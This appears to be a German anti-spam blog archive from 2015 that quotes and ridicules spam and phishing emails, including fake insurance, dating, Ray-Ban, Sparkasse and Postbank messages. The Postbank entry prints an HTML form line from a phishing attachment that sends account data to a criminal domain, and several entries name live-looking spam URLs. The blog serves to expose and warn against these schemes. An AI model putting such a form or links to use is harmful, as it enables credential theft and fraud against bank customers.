Schlagwortarchiv „Screenshot“

Verbessern wir unsere Rankings.

Mittwoch, 16. September 2015

Zunächst einmal, Spammer: Danke für den Punkt am Ende des Betreffs! Menschen machen das ja beinahe nie, aber Spammer, die ihre Skripten nicht völlig verstehen und auch niemals etwas testen, ziemlich häufig. Diese unvergleichlich simple Regel filtert mir immer noch ganz viel von derartigem Zeugs raus.

Jetzt aber zu deiner Spam…

Hallo!

Mir gefällt spam.tamagothi.de . Ich habe eine andere Seite, die dieser sehr ähnlich ist. Ich dachte, vielleicht könnten wir Links oder Artikel zur Verbesserung unserer Google Ranks austauschen?

Ja, hey, hallo,

musste verstehen: Mir gefällt zwar deine Website, aber angeguckt habe ich die nicht, und deshalb habe ich auch deinen Namen im Impressum nicht gefunden. Macht aber nichts, denn wir können ja lustig heychen und halloen, was kümmert schon der Stil in einer Anfrage, die so tut, als sei sie gewerblich.

Musste auch verstehen: Ich habe eine andere Seite, da gehts auch um Spam. Also: Ich will die mit Spam nach oben bringen. Und deshalb sollst du mich verlinken, damit du für mich Google vollspammst. Egal, ob das was für dich und deine Leser ist, oder nicht. Einfach nur wegen dieser auch aus Verlinkungen ermittelten Nummer, die dazu führt, in welcher Reihenfolge Google die Suchergebnisse anzeigt. Weil hey, das ist echt bitter! Wenn ich mal einen Mord begehe, weiß ich genau, wo ich die Leiche so verstecken kann, dass sie niemand mehr findet: Auf der zweiten Seite eines Google-Ergebnisses.

Ich könnte natürlich auch versuchen, Sachen ins Web zu stellen, die von allein verlinkt werden, weil die Menschen, die darauf stoßen, sie so interessant finden, dass sie einen Link setzen. Aber das ist nicht mein Geschäftsmodell. Auf meinen von nahezu jedem Menschen für entbehrlich befundenen Seiten gehts um Abzocke, Betrug, Identitätsmissbrauch oder illegales Glücksspiel. Das ist nämlich mein Geschäftsmodell. Da muss man schon ein bisschen tricksen, um die Opfer in die Falle zu locken. Und da sollen sie ja rein. Wenn dir das auch unter den Bedingungen einer weitgehenden Linkhaftung nichts ausmacht, deine Leser mit solchen Links zu beleidigen, dann kommen wir ins Geschäft: Du setzt mir einen Link zur Google-Manipulation (und vielleicht klicken ja auch ein paar Deppen bei dir rum), und ich setze dir einen völlig wertlosen Link in eine meine Linkschleudern, wo er unter hunderten seinesgleichen in der Bedeutungslosigkeit dümpelt.

Ich kann das nicht alleine machen, wir müssten daher zusammenarbeiten, um davon profitieren zu können.

Hey, und dazu brauche ich dich. Sonst für gar nichts.

Es handelt sich dabei nur um einen Austausch von Links. Damit ist keine Bezahlung jeglicher Art verbunden.

Also hey, komm schon! Du musst mir nicht einmal Geld dafür geben, dass du deine Leser offen verachten darfst und dich selbst mit einem Link auf kriminelle Websites einem strafrechtlichen und einem zivilrechtlichen Risiko aussetzt. Das ist doch ein großartiges Privileg. Du solltest mir dankbar sein, hey!

Geben Sie mir Bescheid, wenn Sie an einer Zusammenarbeit interessiert sind.

Wenn du wirklich glaubst, dass mit einer unpersönlich formulierten Spam irgend etwas Gutes kommen könnte, antworte einfach auf die Spam!

Mit freundlichen Grüßen
Saskia Schimpf

Ich grüße auch freundlich, und…

Datenverkehr.org

…ich habe sogar eine Website. Die trägt den Titel „komplett kostenloser Linktausch“ und es geht da um „komplett kostenlosen Linktausch“. Da steht eine Menge lustiges Zeug drauf (zum Vergrößern klicken)…

…aber ein Impressum habe ich leider vergessen. Übrigens habe ich die Domain nicht unter dem Namen „Saskia Schimpf“ registriert, sondern unter einer lustigen Anschrift in den Vereinigten Staaten eines Teils von Nordamerika. Meinen in früheren Versionen der gleichen Masche in jeder Spam angegebenen Link auf mein LinkedIn-Profil schreibe ich auch nicht mehr rein, aber das hat bestimmt nichts damit zu tun, dass ich sogar für die Trojanerschleuder und Spamsau LinkedIn zu spammig war.

Detail aus der betrügerischen Website, wo Veranstaltungen angekündigt werden -- und zwar ausnahmslos solche aus dem Jahr 2012 Und wenn du dich gerade über den farbenfrohen Kompass auf meiner tollen Seite freust – mein damaliger Kumpel Bruno hat dafür eine ganz schön dicke und sonderbar duftende Zigarette rauchen müssen – vergiss bitte nicht, auch die „Ankündigungen“ darunter eines Blickes zu würdigen, denn diese zeigen dir irre wichtige Veranstaltungen, ja, die sind so wichtig, dass ich sie meinen Lesern eigens ankündige. Die haben zwar nichts mit mir zu tun, aber das macht nichts, denn sie sind ja auch schon seit gut drei Jahren vorbei. Das musste verstehen, hey, es ist gar nicht so leicht, wenigstens ein bisschen Eindruck zu erwecken. Klar, ich könnte die Liste mal anpassen und wenigstens etwas aus dem laufenden Jahr nehmen, aber so viel Mühe sind mir die Deppen, die auf meine dumpfe Nummer reinfallen, nun auch wieder nicht wert. Was mein Geschäftsmodell ist, habe ich ja schon weiter oben erwähnt.

Und jetzt, hey, jetzt bin ich mal voll gespannt, ob du auf mich reinfällst.

Mit spammigen Grüßen und heyzendem Winkewinke
Dein SEO-Surrogatextrakt aus der Spam

Au weia, was sind diese Mails und die dazu gemachten Websites schlecht!

Krankenversicherung praktisch geschenkt!!

Donnerstag, 3. September 2015

So, so, „praktisch geschenkt“. Also nicht geschenkt. 😀

Guten Tag n ,

Immer wieder erstaunlich, wie wenig die Spammer ihre Daten pflegen! Wozu auch, wenn sie sich Mühe gäben, könnten sie ja auch gleich arbeiten gehen.

mehr als 59 Euro pro Monat muss eine gute Krankenversicherung für Angestellte, Selbstständige oder Freiberufler nicht mehr kosten.

So viel zum „praktisch“.

Das Angebot hat sich verändert, zahlreiche neue Tarife haben die Preise deutlich nach unten gedrückt.

So viel zum Grund dafür. Haben wir ja alle aus Presse und Glotze mitgekriegt, dass das mit dem Gesundheitswesen immer billiger wird und dass die Krankenkassen gar nicht mehr wissen, wo sie jetzt die ganzen überschüssigen Milliarden verbrennen sollen. Nicht? Na, sowas aber auch! Da ist dieser asoziale Versender illegaler Spams offenbar besser informiert.

Bezahlen Sie derzeit noch mehr, so könnten Sie jeden Monat sparen – und mehr netto bekommen, und zwar ab dem kommenden Monat.

Aber das Wichtigste ist doch: Dieser Spammer verspricht Geld. Für jeden. (Außer vielleicht für Kranke und Arbeitslose, die das Geld nötig hätten.) Und alles, was man dafür tun muss…

Infos dazu online:
http://www.pkv-fast-geschenkt.com/[ID entfernt]/

…ist ein Klickchen in eine Spam von Verbrechern, die übrigens mit genau dem gleichen Datenbestand auch Fluten von Spam für Dating-Betrug versenden.

Die Domain pkv (strich) fast (stricht) geschenkt (punkt) com wurde erst vorgestern über einen Whois-Anonymisierer aus dem sonnigen Panama anonym registriert und hat es doch schon zu „Ruhm“ gebracht:

Um binnen zweier Tage, deren zweiter noch nicht einmal zur Gänze abgelaufen ist, auf eine Liste mit in Spams benutzten Domains zu kommen, muss man schon ziemlich wahllos und schrotmunitionsartig alles zuspammen, was sich nur zuspammen lässt.

Aber deshalb wird ja auch eine Wegwerf-Domain benutzt, auf der es nur eine Weiterleitung in die Domain krankenkasse (strich) billiger (punkt) net gibt. Diese ist ebenfalls über einen Dienstleister aus dem sonnigen Panama anonym registriert worden, ist aber schon fast einen Monat alt. Immerhin haben die Verbrecher mal wieder ein neues Design für ihre Datensammelmaschine für allerlei Betrugsgeschäfte gebaut:

Wer möchte, kann die aktuelle Spamflut hier auf Unser täglich Spam mit früheren Versionen der gleichen Masche vergleichen. Und ja, das kommt alles vom selben Geschmeiß, wie man beim Überfliegen der Spams leicht erkennen kann. Die Frage, was diese recht anonym auftretenden Spammer mit Daten machen, die für einen kriminellen Identitätsmissbrauch völlig ausreichend sind, beantwortet entweder ein funktionierendes Gehirn im Schädel oder im Bedarfsfall auch ein freundlicher Beamter in der nächsten Polizeidienststelle.

Mit freundlichen Grüßen,

Bianca Meyer
Kundenservice

Oh, diese Freundlichkeit!

Keine weiteren Infos?
http://www.pkv-fast-geschenkt.com/abm/[ID entfernt]/

Du kannst mich auch mal!

Ray Ban Sonnenbrille! Nur 24 Stunden! EXTRA 90% Rabatt!

Mittwoch, 2. September 2015

Nur 24 Stunden! Der Rabatt rennt vor euch weg!

Ray Ban Sonnenbrille! Nur 24 Stunden! EXTRA 90% Rabatt!

Das hast du schon im Betreff gesagt, Spammer!

Im Webbrowser anzeigen: http://brille.bagdubak.org.

Die Spam ist eine HTML-formatierte Mail, und der Link geht nicht auf die im Linktext angegebene URL, sondern zusammen mit einer eindeutigen ID in der URI in die Domain suneus (punkt) com, damit der Spammer auch mitbekommt, bei wem die Spam ankommt und beklickt wird. Von dort wird dann in die Domain bagdubak (punkt) com weitergeleitet, damit die Opfer dieses Trackings nicht merken, dass sie keinen ganz gewöhnlichen Link geklickt haben. Nichts ist einem kriminellen Spammer so zuwider wie das Setzen eines direkten Links.

Es hat aber nichts geholfen. Sowohl suneus (punkt) com als auch brille (punkt) bagdubak (punkt) org stehen bereits auf jeder Blacklist dieser Welt, und die Spam wird zielsicher in den Müll befördert, wo sie hingehört.

Sie erhalten diese E-Mail, weil Sie eine Ray-Ban E-Mail-Abonnent sind. Unsere Datenschutzrichtlinie.

Ach, so nennt man das heute!

Um aus unserer Mailingliste gestrichen werden, klicken Sie bitte hier: Abmelden Hier.

Wer auf „click here“ klickt, lasse alle Hoffnung fahren!

Copyright ©2006 Ray Ban Inc. All rights reserved…

Wow, von 2006. Diese Spam ist aber lange „gereift“. Deshalb ist sie wohl auch so „gut“ geworden…

Sonnenbrillen von Ray-Ban nach Modell, Gestellmaterial, Gestellfarbe und Gläserfarbe im Ray-Ban Deutschland Online-Shop kaufen.

Unfassbar! Die Spam ist zu Ende, und da fällt dem Spammer ein, dass er in der Spam vielleicht auch mal mitteilen könnte, um was es geht. Großes Kino im kleinen Köpfchen!

Ob seine Website wohl besser ist als diese gnadenlos miese Spam? Die Domain bagdubak (punkt) org wurde über einen Whois-Anonymisierer aus dem brummenden Peking im Frühling dieses Jahres anonym registriert. Sie dient aber nur als Weiterleiter zum „Shop“ in der Domain neubrille (punkt) com, die im Sommer dieses Jahres ebenfalls anonym registriert wurde. Ob dieser Shop wohl „besser“ als die Spam ist? Ach, ich habe mal einen Screenshot davon gemacht, denn auch hier AUSSER BIS 85% RABATT! Über 2 Brillen, Freies Verschiffen! Bitte auch nach unten scrollen! 😉

Was sich auf dieser Website nicht findet, ist ein Impressum.

Diese Qualitätsspam ist ein Kandidat für eine der schlechtesten Spams dieses Jahres…

Wir haben eine Uberraschung fur Sie

Mittwoch, 19. August 2015

Korrekt kodierte Umlaute in einer E-Mail scheinen es nicht zu sein. 😀

Sehr geehrter Gast

Sind wir nicht alle nur Gäste auf dieser Welt?

Haben Sie herzlichen Dank fur das kleine Aufmerksamkeit an unserem neuen Projekt, welcher wir Ihnen hier kurz vorstellen mochten.

Du bedankst dich bei mir dafür, dass du mir mit deiner Spam etwas von meiner beschränkten Zeit stiehlst. Du bist ja richtig höflich!

Das Projekt wurde vor Kurzem ins Leben gerufen und hat schon einige Mannerherzen zum schlagen gebracht. Du findest uns unter Junp4Love nd wir sind sicher, dass du bei uns gut aufgehoben bist. Hier findest du die besten und die schonsten Frauen aus der Ukraine, die dein Herz hoher schlagen lasst. Wir sind sicher, dass du hier die Frau deiner Traume und fur dein Leben finden wirst.

Du hast eine tolle neue Website, wo man überteuerten Schriftverkehr mit deinen Dating-Bots haben kann. Und du gehst selbst davon aus, dass dein Betrug ohne illegale und asoziale Spam von niemanden gefunden würde, trotz deiner Zusicherung…

…dass es dort echte Frauen und echte Profile gibt. Denn wie man an deiner Spam und an deiner Masche sieht, hast du ja auch ein echtes Gehirn.

Am Anfang schenken wir dir 10 Kredite die dir verhelfen unseren neuen Projekt kennenzulernen und sich vergewissern, dass hier die schonsten Frauen aus Ukraine auf dich warten.

Nein danke, davon habe ich mich schon vor viereinhalb Jahren versichert. Die Designs der Seiten wechseln, die Spam und der Beschiss bleiben gleich.

Sei mit uns und wir machen dich glucklich! Mit uns werden deine Traume in Erfullung gehen.

Nicht jeder Traum ist angenehm.

Katerina
Katerina 26
Nikolaev, Ukraine
User ID: 171244

Valentina
Valentina 22
Odessa, Ukraine
User ID: 330357

Elena
Elena 26
Kharkiv, Ukraine
User ID: 330595

Galina
Galina 22
Odessa, Ukraine
User ID: 332384

Valeria
Valeria 23
Odessa, Ukraine
User ID: 336892

Und nicht jede Namensliste ist interessant.

Wir wunschen dir nur das Beste, dein Jump4Love
Registrierung

Ich wünsche dir auch alles Gute für deinen weiteren Lebensweg, Spammer!

Julia und ich können uns nicht entscheiden ob…

Montag, 17. August 2015

Werft doch einfach eine Münze, wenn ihr euch so sehr mit der Entscheidung quält, dass ihr mir das gleich achtfach mailen müsst! Oh, auf der anderen Adresse habe ich auch noch elf davon… weia, müsst ihr es nötig haben!

Hallo Eli!

Der Name ist ja fast richtig!

Unsere Mitglieder hinterlassen Dir folgende Nachricht:
„Sarah und ich haben Dein Profil auf www.flirt-dreier.com entdeckt und würden Dich gerne kennenlernen.
Wir sind 25 und 26 Jahre alt und studieren beide BWL. Hättest Du Lust uns mal kennenzulernen zum…“

Zum was? Das ist aber auch schade, dass der Platz in E-Mails immer so begrenzt ist. Und ich sitze jetzt hier und soll mich fragen, ob die beiden BWL-Studentinnen mich kennenlernen wollen, um herauszukriegen, ob ich Lust habe, die veröffentlichten Bilanzen einiger DAX-Unternehmen zu analysieren oder ob sie noch andere Interessen haben. Aber der Spammer bietet mir ja einen Weg, und das Hinweisschild auf diesem Weg lautet „Click here“:

Zum Beantworten dieser Nachricht klicke hier:

http://www.flirt-dreier.com/[ID entfernt]

Willst Du erstmal das Profil der beiden ansehen klicke hier:

http://www.flirt-dreier.com/[ID entfernt]

Wie üblich ist das eine Wegwerfdomain, und der Klick ist eine Weiterleitung in die Website unter der Domain whatsfuck24 (punkt) com, also ein „alter Bekannter“. Dieser erstrahlt jetzt freilich in neuem Gewande¹:

Die schwarzen Balken sind natürlich von mir, und wer sich noch nicht vorstellen kann, was darunter zu sehen wäre, gehört zu denen, wofür ich sie reingemacht habe. 😉

Und überhaupt: Das muss doch unbequem sein mit den Schuhen im Bett.

Viel Spass beim Flirten zu Dritt
Dein Team von Flirt-Dreier

So so, „Flirten zu dritt“ nennt man das jetzt also…

Keine Dreier-Flirt-Nachrichten mehr?
http://www.flirt-dreier.com/abm/[ID entfernt]

Vor meinem Arsch ist auch kein Gitter!

¹Sorry, ich habe heute einen Clown gefrühstückt…

Sparkasse Online-Konto Aktualisierung

Donnerstag, 13. August 2015

Sehr geehrter Kunde,

Genau mein Name!

HINWEIS: Zugriff auf Ihr Online-Konto läuft kurz.

HINWEIS: Zugriff auf das Spammerhirnchen läuft knapp.

Um weiterhin diesen Vorteil zu nutzen, bitten wir Sie Daten auf den folgenden Link, um zu bestätigen.

Sparkasse Online-Konto Aktualisierung: klicken Sie hier

Toll, in ein gecracktes WordPress-Blog! Da glaubt jeder – die Spam ist ja auch sprachlich wieder einmal extragut geraten – sofort an die Sparkasse und gibt deshalb in einem „Antrag“ lauter Daten ein…

…die die echte Sparkasse schon lange kennt. Egal, was für einen Sinn das haben soll. So kommen Verbrecher an Konten anderer Leute und an Adressmaterial für betrügerischen Identitätsmissbrauch.

Gut, dass die meisten Phisher so stümperhaft sind.

Schlimm, dass es trotzdem zu funktionieren scheint.

Dank für Ihre Mitarbeit und Verständnis.

Mit freundlichen Grüßen.
Ihre Sparkasse Kundenservice.

Mit mechanischem Gruß vom Phisher.

Stagefright-Virus bedroht ihr Konto

Dienstag, 11. August 2015

Das Wichtigste vorab: Diese E-Mail kommt nicht von der Postbank. Es ist Phishing und der Versuch, ihnen einen Trojaner unterzujubeln. Löschen sie diese E-Mail! Wenn sie das mir als „irgendeinem dahergelaufenen Blogger“ nicht glauben wollen (was durchaus vernünftig ist, denn sie kennen mich nicht und ich kann ein beliebiger Vollidiot sein), überzeugen sie sich davon, indem sie kostenlos bei der Postbank-Hotline für Sicherheitsfragen unter der Telefonnummer 0800 1008906 anrufen und dort noch einmal nachfragen! Und nachdem sie dort die Bestätigung gehört haben, löschen sie diese Spam! Die Postbank versendet solche E-Mails nicht. Kommen sie auf gar keinen Fall auf die Idee, wegen einer E-Mail einer Bank irgendwelche Daten irgendwo einzugeben! Egal, was der Grund dafür sein soll! Es ist eine sehr schlechte Idee, die sie viel Geld kosten kann und ihnen monatelangen Ärger aller Art einbringen kann. Und wenn sie schon die Hotline anrufen, stellen sie dort auch gleich die Frage, warum vor dieser sehr gefährlichen laufenden Betrugsnummer noch nicht prominent auf der Kundenwebsite der Postbank gewarnt wird, denn zurzeit scheint bei der Postbank noch niemand auf diese naheliegende Idee gekommen zu sein – obwohl dort ansonsten geradezu vorbildlich auf gängige Betrugsmaschen hingewiesen wird. Eine prominent platzierte Warnung könnte so viel Schaden verhindern und kostet dabei so wenig Aufwand…

So, jetzt aber…

Es war ja klar, dass die Spammer darauf aufspringen würden. Wer auch nur eine Spur Verantwortung fühlt, wird allerdings niemals auf die Idee gekommen sein, seine Kontoführung mit einem Wischofon¹ zu machen – denn in diesen werksseitig funktionslimitierten Computern für Dumme verbindet sich die Security-Blauäugigkeit der Neunziger Jahre mit der technisch kompetenten organisierten Kriminalität der Zehner Jahre.

Tja, und wer seine Kontoführung nicht mit so einem gefährlichen Spielzeugtelefon macht, der lacht schon beim Anblick des Betreffs, lehnt sich zurück und hat eine Möglichkeit weniger, mit derart plumpen Nummern überrumpelt zu werden.

Diese Spam habe ich übrigens nicht selbst empfangen, sie wurde mir von einem Freund mit Konto bei der Postbank zugesteckt, der schon wegen des…

Von: „Postbank.de“ <do-not-reply@postbank.de>

…in der Spam angegebenen Absenders verunsichert war, ob sie nicht echt sein könnte. Ich hoffe, er hat sich jetzt für alle Zeiten gemerkt, das der Absender einer E-Mail ohne Aufwand gefälscht werden kann und somit gar nichts über die Herkunft einer E-Mail sagt. Was Banken tun können, um solche Verunsicherungen bei Empfängern von kriminellen Phishing-Spams zu verhindern, habe ich schon vor vier Jahren geschrieben und werde es hier nicht wiederholen. Dass die meisten Banken immer noch nichts tun, ist ein Beleg dafür, dass ihnen ihre Kunden egal sind und dass sie sich nicht daran stören, wenn Kriminelle das Geld ihrer Kunden für dicke Autos, Kokain und Prostituierte ausgeben können. Als Kunde einer solchen Bank würde ich die darin ausgedrückte Verachtung in vollem Umfang zurückgeben und mir einen seriöseren Dienstleister für meine Geldsachen suchen.

Sehr geehrte/r Kunde,

Weder kennt diese „Postbank“ den Namen des Empfängers, noch macht sie eine Angabe, auf welches Konto sich diese Mail bezieht². Spätestens an dieser Stelle sollte jedem Empfänger klar sein, dass es sich um eine Spam handelt.

Die Postbank Sicherheitszentrale [sic! Deppen Leer Zeichen] warnt vor einer Sicherheitslücke beim Smartphone-Betriebssystem Android von Google. Hacker könnten die Daten einfach per MMS stehlen [sic!] und ihr Handy karpern. Der Virus schleicht sich von alleine in ihr System [sic! Komma fehlt.] ohne dass Sie es bemerken.

Ich gehe darauf inhaltlich nicht weiter ein, außer vielleicht diese eine Kleinigkeit: Es geht bei Stagefright nicht um „Daten per MMS stehlen“, sondern um „beliebigen Code in eine MMS (oder ein irgendwie, zum Beispiel bei einem Hangout, vom Wischofon verarbeitetes Video) einbetten und unbemerkt ausführen“. Der „Postbank Sicherheitszentale“ aus der wirren Kopfwelt dieser Spammer scheint das nicht so völlig klar zu sein, und offenbar setzen die Kriminellen auch darauf…

Einen ausführlichen Bericht über den Stagefright Virus finden sie auf Hier [sic!]

…dass ihre Opfer mit dem verlinkten Artikel auf Zeit Online intellektuell überfordert sind. Das sind ja immerhin Buchstaben, die Text formen, der gelesen werden will – und übrigens recht unklar ist, da er mutmaßlich von einem Journalisten ohne vertiefte technische Kenntnisse verfasst wurde. Eine etwas klarere Darlegung gibt es bei Heise Online.

So schützt die Postbank Sie!

1. Wenn Sie im Besitz einen Android-Handys dann folgen Sie bitte den Anweisungen!

Aha, die „Postbank“ schützt mich, indem ich den Anweisungen folge. Vielleicht sollten die „Sicherheitsexperten“ dort mal einen Deutschexperten einstellen, damit die Formulierungen nicht so mies klingen… 😀

2. Klicken Sie „hier“ oder öffnen Sie die Datei in ihrem E-Mail Anhang!

Ein Klick auf „Click here“ in einer digital unsignierten Mail eines Unbekannten ist immer ein ganz besonders großer Beitrag zur Computersicherheit…

3. Füllen Sie alle Daten aus und bestätigen Sie auf „Daten absenden“

Ich denke, die „Postbank“ will mich schützen. Stattdessen soll ich einen Anhang öffnen und ausfüllen. Dieser Anhang ist übrigens eine HTML-Datei. Wer Interesse daran hat: den Quelltext habe ich bei Pastebin hochgeladen. Das Wichtigste steht in Zeile 110, ich habe hier mal den interessanten Teil isoliert:

<form ... action="http://b.adress-datenabgleich.com/postbank_check.php" ...>

Die eingegebenen Daten gehen nicht an einen Server in der Domain der Postbank, sondern über die obskure und vor ein paar Tagen anonym registrierte Domain adress (strich) datenabgleich (punkt) com an einen von Verbrechern kontrollierten Server, der zu diesem Zeitpunkt erfreulicherweise schon vom Internet genommen wurde. (Ein Dank an den Hoster für die schnelle Reaktion! Aber es kann ja auch nicht jeder so langsam wie die Postbank sein, wenn millionenfacher Betrug durchgeführt wird…)

Welche Daten das sind? Diese Daten hier:

Screenshot des Anhanges mit einer Phishing-Seite im Design der Postbank. Unter der Überschrift 'Postbank Stagefright Virus entfernen' soll die E-Mail-Adresse, die Kontonummer und ein Passwort oder eine PIN eingegeben werden.

Wer den Verbrechern so Zugriff auf das Postbank-Konto gegeben hat und ihnen bestätigt hat, unter welcher Adresse die Spam ankommt und beklickt wird, darf sich schon „freuen“:

Der nigelnagelneue Trojaner, den garantiert noch kein Antivirus-Schlangenöl kennt, wird gleich hinterhergeliefert.

Wir senden ihnen umgehend eine E-Mail mit einer Software mit der Sie den Stagefright-Virus entfernen können.

Die allerdings sehr naheliegende Frage, warum die „Postbank“ nicht gleich jedem ihrer angemailten Kunden eine E-Mail mit einer derartigen Software zusenden sollte, die beantwortet der freundliche Phisher und Cracker nicht.

Übrigens ist „Stagefright“ kein Virus, außer vielleicht in einem eher skurillen Sinn des Wortes. Es ist eine schwere, auf vielerlei Wegen ausbeutbare Sicherheitslücke in Android.

Mit freundlichen Grüßen
Ihre Sabine Heinel
Postbank Newsletter-Redaktion

Wenn das die Freundlichkeit ist, will man den Hass nicht mehr kennenlernen.

¹Wischofon ist mein deutsches Wort für das Reklamewort „smart phone“. Es bezeichnet den Gegenstand nach der Tätigkeit, die am häufigsten auf ihn ausgeführt wird: Wischen mit den Fingern. Ich meine das nicht als Schimpfwort.

²Es ist gar nicht selten, dass jemand mehrere Konten hat.

Re: Signed Invoice

Donnerstag, 6. August 2015

Die ist ja kurz!

Dear Sir,
The attached invoice is for FYI.

Best Regards.

So weit, so schlecht. Bei diesem kurz angebundenen Text erwarte ich eine knackige EXE-Datei in einem ZIP-Archiv; aber nein, es handelt sich wirklich um ein PDF. Dieses PDF sieht aber nicht aus wie eine Rechnung, sondern es sieht so aus:

Screenshot eines Teils des PDFs

So sieht zumindest die obere rechte Ecke des PDFs aus. Sie zeigt den Hinweis, dass es eine angehängte Datei gibt (als ob man das nicht in seiner Mailsoftware gesehen hätte), ein übergroßes PDF-Piktogramm und einen klicki klicki Linktext mit „Click here“. Der Link aus dem PDF ist kein direkter Link, sondern wird über einen URL-Kürzungsdienst umgeleitet. Und zwar auf eine Website…

Screenshot der gefährlichen Website

…die so tut, als sei sie Google, die aber in wenig überraschender Weise mit Google…

Detail: Die angezeigte URL in der Adressleiste des Browsers

…so viel zu tun hat wie eine kaputte Glühlampe mit dem hellen, warmen Sonnenlicht. Natürlich muss man Javascript freischalten, um irgendwas auf dieser Website von Kriminellen zu machen, und was man sich dort alles einfangen kann, verrät schon die Spam, der falsche Eindruck, es handele sich um Google und die merkwürdige Art, in der ein Link auf diese Site platziert wurde.

Selbstverständlich wird – neben dem angebotenen Download von Daten, die Kriminelle mit einer Spam untergejubelt haben – auch gleich das Google-Passwort abgefragt und zu diesem Geschmeiß gesendet, wenn man auf „Download“ klickt – aber ich hatte bei dem schönen Wetter heute keine Lust, den Rest der Javascript-Quelltexte zu lesen. Wenn es neben Phishing auch noch eine aktuelle Kollektion Schadsoftware gibt, bin ich davon nicht überrascht.

Was diese Spam interessant macht, obwohl sie in ihrer Machart eher primitiv ist: Die frühere Vorgehensweise mit dem „Dokument im ZIP-Archiv“ scheint für die Verbrecher nicht mehr so erfolgversprechend zu sein – was leider nicht heißt, dass ich solche Spams nicht mehr sähe – und so suchen sie nach neuen Wegen, um Leute zu überrumpeln.

Deshalb: Immer aufmerksam bleiben! Vor allem, wenn Unbekannte „Rechnungen“ oder „Mahnungen“ in Mailanhängen versenden, aber im Text der Mail nichts Substanzielles mitzuteilen haben (weil man sonst sofort bemerken würde, dass es sich um gegenstandslose Behauptungen handelt). So einen Müll einfach löschen und vergessen, es gibt nämlich Schöneres im Internet als Trojaner und sonstige Schadsoftware.